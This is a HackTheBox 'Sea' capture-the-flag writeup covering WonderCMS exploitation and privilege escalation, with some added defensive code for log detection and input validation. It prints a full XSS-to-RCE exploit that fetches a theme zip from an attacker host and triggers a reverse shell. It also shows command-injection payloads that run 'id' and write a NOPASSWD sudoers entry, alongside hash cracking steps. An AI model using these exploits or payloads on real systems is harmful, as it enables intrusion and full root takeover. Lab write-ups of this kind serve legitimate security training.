Suhaib518Aljuhani
HackTheBox - Sea writeup

Last updated 4 months ago


First view/look

We can start with an Nmap scan of the target to see which ports are open and get a first look:

nmap -sCV $box

We now know that two ports are open:
1. SSH - OpenSSH 8.2p1
2. HTTP - Apache httpd 2.4.41
This looks like a typical Linux machine: exploit the site on HTTP, then authenticate to SSH to get the user flag, then continue to privilege escalation.

First look for the site

Note: you should add [box_ip sea.htb] to your /etc/hosts file

We land on this page; clicking Contact shows a page with a contact form, but there is nothing interesting to get from it yet.

feroxbuster -u http://sea.htb -w /usr/share/wordlists/dirb/big.txt

We can see now that we have some interesting paths, like /themes/bike/version for example.

If we visit that page we can see the version but not the service used unfortunately.

If we try a different wordlist, we get an interesting file.

We can read the README.md contents to learn which service is used here:

curl sea.htb/themes/bike/README.md
# WonderCMS bike theme

## Description
Includes animations.

## Author: turboblack

## Preview
![Theme preview](/preview.jpg)

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.

Now we know that the service is WonderCMS v3.2.0

The first thing to take care of, now that we know the service, is to look for public PoCs for it.

We can use this exploit to get a reverse shell as www-data

Now we can go back to the Contact form and send this to the admin, as the exploit says:

I edited the code to fix the problem with the urlWithoutLogBase variable:

# Exploit: WonderCMS XSS to RCE (edited: urlWithoutLogBase is now the hostname taken from the login URL)
import sys
import os

if (len(sys.argv) < 4):
  print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
else:
  # JavaScript that runs in the admin's browser once the XSS link is opened
  data = '''
var url = "'''+str(sys.argv[1])+'''";
if (url.endsWith("/")) {
 url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = new URL(urlWithoutLog).hostname;
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase+"/?installModule=http://10.10.14.99:8000/main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
 if (xhr3.status == 200) {
   var xhr4 = new XMLHttpRequest();
   xhr4.withCredentials = true;
   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
   xhr4.send();
   xhr4.onload = function() {
     if (xhr4.status == 200) {
       var ip = "'''+str(sys.argv[2])+'''";
       var port = "'''+str(sys.argv[3])+'''";
       var xhr5 = new XMLHttpRequest();
       xhr5.withCredentials = true;
       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
       xhr5.send();
     }
   };
 }
};
'''
  try:
    with open("xss.js", "w") as f:
      f.write(data)
    print("[+] xss.js is created")
    print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
    print("----------------------------\n")
    # Link for the admin: closes the login form and loads xss.js from our HTTP server
    XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
    XSSlink = XSSlink.strip(" ")
    print("send the below link to admin:\n\n----------------------------\n"+XSSlink)
    print("----------------------------\n")

    print("\nstarting HTTP server to allow the access to xss.js")
    os.system("python3 -m http.server\n")
  except Exception: print(data,"\n","//write this to a file")

We got the shell successfully! But make sure to visit http://sea.htb/themes/bike/revshell-main/rev.php?lhost=YOUR_IP&lport=YOUR_LISTENING_PORT, because we installed our own main.zip: if you unzip the file you will see a directory called revshell_main with a rev.php file inside, so we need to visit the imported module there to execute our reverse shell!
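From the defender's side, the same chain leaves a very recognisable trail in the web server's access log. The following Python is an added example (mine, not part of the original writeup) that scans constructed Apache access-log lines for the three request shapes above: the XSS link opened by the admin, the installModule fetch from an outside host, and the theme-level rev.php callback trigger. The log lines and the token value are constructed.

```python
import re
from urllib.parse import unquote, urlparse, parse_qs

# Constructed sample Apache access-log lines (not taken from the box); they mirror
# the request chain above: XSS link, installModule fetching a zip from an outside
# host, then the theme's rev.php being called with lhost/lport.
SAMPLE_LOG = """\
10.10.14.99 - - [10/Aug/2024:15:20:01 +0000] "GET /themes/bike/version HTTP/1.1" 200 6
127.0.0.1 - - [10/Aug/2024:15:22:10 +0000] "GET /index.php?page=loginURL?%22%3E%3C/form%3E%3Cscript+src=%22http://10.10.14.99:8000/xss.js%22%3E%3C/script%3E HTTP/1.1" 200 2011
127.0.0.1 - - [10/Aug/2024:15:22:11 +0000] "GET /?installModule=http://10.10.14.99:8000/main.zip&directoryName=violet&type=themes&token=CONSTRUCTED_TOKEN HTTP/1.1" 200 512
10.10.14.99 - - [10/Aug/2024:15:22:15 +0000] "GET /themes/revshell-main/rev.php?lhost=10.10.14.99&lport=4444 HTTP/1.1" 200 0
10.10.14.99 - - [10/Aug/2024:15:25:00 +0000] "GET /themes/bike/README.md HTTP/1.1" 200 300
"""

# Combined-log-format prefix: client, identd, user, timestamp, request line, status.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A .php file directly under a theme directory is not something WonderCMS themes ship.
THEME_PHP_RE = re.compile(r'^/themes/[^/]+/[^/]+\.php$')

def analyze(log_text):
    """Return one alert dict per suspicious request, in log order."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        parsed = urlparse(target)
        query = parse_qs(parsed.query)
        decoded = unquote(target).lower()
        base = {"ip": m.group("ip"), "time": m.group("ts"), "target": target}
        # Rule 1: closing a form and pulling in a <script> through the URL is the XSS link.
        if "<script" in decoded or "</form>" in decoded:
            alerts.append({**base, "rule": "xss_payload_in_url", "detail": "script/form tag in URL"})
        # Rule 2: a module/theme install driven by a GET parameter is a rare admin action;
        # record where the archive was fetched from so a reviewer can judge it.
        if "installModule" in query:
            src_host = urlparse(query["installModule"][0]).hostname or "?"
            alerts.append({**base, "rule": "wondercms_module_install", "detail": f"source host {src_host}"})
        # Rule 3: theme-level PHP taking lhost/lport is the reverse-shell trigger.
        if THEME_PHP_RE.match(parsed.path) and {"lhost", "lport"}.issubset(query):
            alerts.append({**base, "rule": "theme_php_reverse_shell",
                           "detail": f"callback to {query['lhost'][0]}:{query['lport'][0]}"})
    return alerts

if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(a["time"], a["ip"], a["rule"], a["detail"])
```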

Foothold - User flag

Now we have a shell as www-data. The first thing that comes to mind is to look in /var/www/sea for any configuration file that could give us sensitive information, and maybe a password, to move one step further!

We find a database.js file inside the data directory, so we can check it for user credentials or other important information.

We got a password hash. We need to crack it, but we don't know which user it belongs to, so we can check /etc/passwd for the users on the box and know which user to authenticate to SSH as once the password is cracked.

We see only amay there, so the password is amay's password.

— Cracking the password using hashcat:

hashcat -m 3200 amay_hash.txt /usr/share/wordlists/rockyou.txt

We can now authenticate via SSH as amay.

— Authenticating via SSH:

ssh amay@sea.htb

Privilege Escalation

As we can't run sudo as amay, we should check the listening ports by running ss -tuln to see which services we can forward to our machine for privilege escalation!

ss -tuln

We can see that port 8080 is listening, so we should port forward it to see what interesting things are there.

— Port forwarding command:

ssh amay@sea.htb -L 8080:127.0.0.1:8080

Now we should visit http://localhost:8080 on our local machine to see what is running on this port.

First, you will get a prompt asking for a username and password; you can use the same credentials as for SSH.

Then, we can get this page:

We can see a log file and an Analyze button, which shows us the suspicious logs.

Our SSH session is detected as a suspicious pattern.

The first thing that comes to mind here is that maybe there is an LFI??

We can use Burp Suite to modify the request and check whether the site is vulnerable to LFI or even RFI.

Looks like it's vulnerable to LFI, hmm, so can we now check whether it's also vulnerable to RFI or ...?

As we used log_file=%2Fetc%2Fpasswd, which decodes to /etc/passwd, we can now try log_file=%2Fetc%2Fpasswd+%26%26+id+#

Ohh, it's really vulnerable to RFI: the appended id command gets executed!!

As we can execute commands as root, we can now add amay to sudoers with full permissions to gain full root access!

— Adding amay to sudoers with full permissions:

log_file=/etc/passwd+%26%26+echo+"amay+ALL=(ALL)+NOPASSWD:+ALL"+>+/etc/sudoers.d/amay+#

Now, in our SSH session, we can run sudo -l to check whether we are in the sudoers files, then sudo -s to get root!
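Since the writeup never shows the analyzer's own code, this added example (mine, not the box's) assumes the service on 8080 concatenates the log_file value into a shell command, which is what the working && id payload implies. The hardened handler below never builds a shell command and accepts only plain file names under an allowlisted directory, so both payloads above are refused; the directory, sample log line and function names are constructed.

```python
import os
import tempfile
from urllib.parse import unquote_plus

# Constructed allowlisted log directory with one sample log file (not the box's real setup).
LOG_DIR = tempfile.mkdtemp(prefix="sea_logs_")
with open(os.path.join(LOG_DIR, "access.log"), "w") as f:
    f.write('127.0.0.1 - - "GET /index.php HTTP/1.1" 200\n')   # constructed sample line

# Characters that would let a value change the meaning of a shell command line.
SHELL_META = set(';&|`$<>(){}\n\r')

def resolve_log_file(raw_param, base_dir=LOG_DIR):
    """Validate the log_file form value and return an absolute path inside base_dir.

    Raises ValueError for anything that is not a plain file name inside the allowlist.
    """
    value = unquote_plus(raw_param)          # same decoding the web server applies
    if any(ch in SHELL_META for ch in value):
        raise ValueError("shell metacharacters in log_file")
    if os.path.isabs(value) or ".." in value.split("/"):
        raise ValueError("absolute path or traversal in log_file")
    root = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(root, value))
    if os.path.commonpath([root, full]) != root:
        raise ValueError("path escapes the log directory")
    if not os.path.isfile(full):
        raise ValueError("not a regular file")
    return full

def analyze_log(raw_param):
    """Read the chosen log directly in Python: no shell is involved, so appended
    commands such as '&& id' can never run. Returns the number of log lines."""
    with open(resolve_log_file(raw_param)) as fh:
        return sum(1 for _ in fh)

def is_rejected(raw_param):
    """True when the validator refuses the value (used to check the writeup's payloads)."""
    try:
        resolve_log_file(raw_param)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    for p in ["access.log", "%2Fetc%2Fpasswd", "%2Fetc%2Fpasswd+%26%26+id+#"]:
        print(repr(unquote_plus(p)), "rejected" if is_rejected(p) else f"{analyze_log(p)} line(s)")
```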

Sea Machine Pwned!!

You can support me if you liked the content, thank you!!

Tooling note: to enumerate the site for interesting pages we can use gobuster or feroxbuster, but I prefer feroxbuster. You can install it from https://github.com/epi052/feroxbuster. The WonderCMS XSS-to-RCE exploit used above comes from https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413